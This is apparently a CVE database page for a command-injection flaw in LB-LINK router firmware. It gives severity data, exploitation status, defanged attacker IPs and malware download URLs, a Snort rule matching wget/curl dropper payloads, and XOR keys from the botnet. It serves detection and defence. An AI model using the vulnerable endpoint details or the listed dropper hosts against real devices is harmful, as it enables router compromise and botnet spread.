cbcvebase.
CVE-2023-26801
published 2023-03-26

CVE-2023-26801: LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection…

PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
69.66%
99.3th percentile
LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection vulnerability via the mac, time1, and time2 parameters at /goform/set_LimitClient_cfg.

Affected

4 ranges
VendorProductVersion rangeFixed in
lb-linkbl-ac1900_firmware
lb-linkbl-lte300_firmware
lb-linkbl-wr9000_firmware
lb-linkbl-x26_firmware

Detection & IOCsextracted from sources · hover to see the quote

ip163.123.143[.]126
urlhxxp://163.123.143[.]126/bins/dark.x86
urlhxxp://163.123.143[.]126/bins/dark.mips
urlhxxp://163.123.143[.]126/bins/dark.mpsl
urlhxxp://163.123.143[.]126/bins/dark.arm4
urlhxxp://163.123.143[.]126/bins/dark.arm5
urlhxxp://163.123.143[.]126/bins/dark.arm6
urlhxxp://163.123.143[.]126/bins/dark.arm7
urlhxxp://163.123.143[.]126/bins/dark.ppc
urlhxxp://163.123.143[.]126/bins/dark.m68k
urlhxxp://163.123.143[.]126/bins/dark.sh4
urlhxxp://163.123.143[.]126/bins/dark.86_64
urlhxxp://2.56.59[.]215/i.sh
urlhxxp://212.192.241[.]72/lolol.sh
ip2.56.59[.]215
ip195.133.40[.]141
urlhxxp://31.210.20[.]100/lolol[.]sh
urlhxxp://212.192.241[.]72/lolol[.]sh
urlhxxp://212.192.241[.]87/bins/
domaindotheneedfull[.]club
ip193.47.61[.]75
filenamelb.sh
path/goform/set_LimitClient_cfg
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT LB-Link Command Injection Attempt (CVE-2023-26801)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:27; content:"/goform/set_LimitClient_cfg"; http.request_body; content:"time1="; startswith; fast_pattern; content:"&time2"; distance:0; content:"&mac="; distance:0; pcre:"/^[^&]*?(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9; reference:cve,2023-26801; classtype:attempted-admin; sid:2048548; rev:3;)
bytes
XOR key 0xBAADF00D (bytewise: 0xBA ^ 0xAD ^ 0xF0 ^ 0x0D = 0xEA)
bytes
Telnet/SSH credentials XOR key 0x54
  • Exploit traffic targets HTTP POST to /goform/set_LimitClient_cfg with parameters time1, time2, and mac; payload contains wget or curl commands for dropper download (regex: /^[^&]*?(?:(wget|curl))/R in body)
  • URI length for exploit request is exactly 27 bytes (/goform/set_LimitClient_cfg); use bsize:27 in URI matching to reduce false positives
  • Threat Prevention signatures 93386, 93718, 93721, 93722 cover the exploit and malware activity associated with this campaign
  • The botnet uses custom UPX packing with unique signatures; standard UPX detection may miss samples — look for UPX headers with non-standard magic bytes
  • ·The Tenda vulnerability exploit function in this IZ1H9 sample contains a bug: it downloads tenda.sh but executes netlog.sh, meaning that particular exploit chain will not work as intended
  • ·The reported hash artifact (692a5d099e37cd94923ea2) appears truncated in the source document and may be incomplete; verify against full hash before using for detection

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.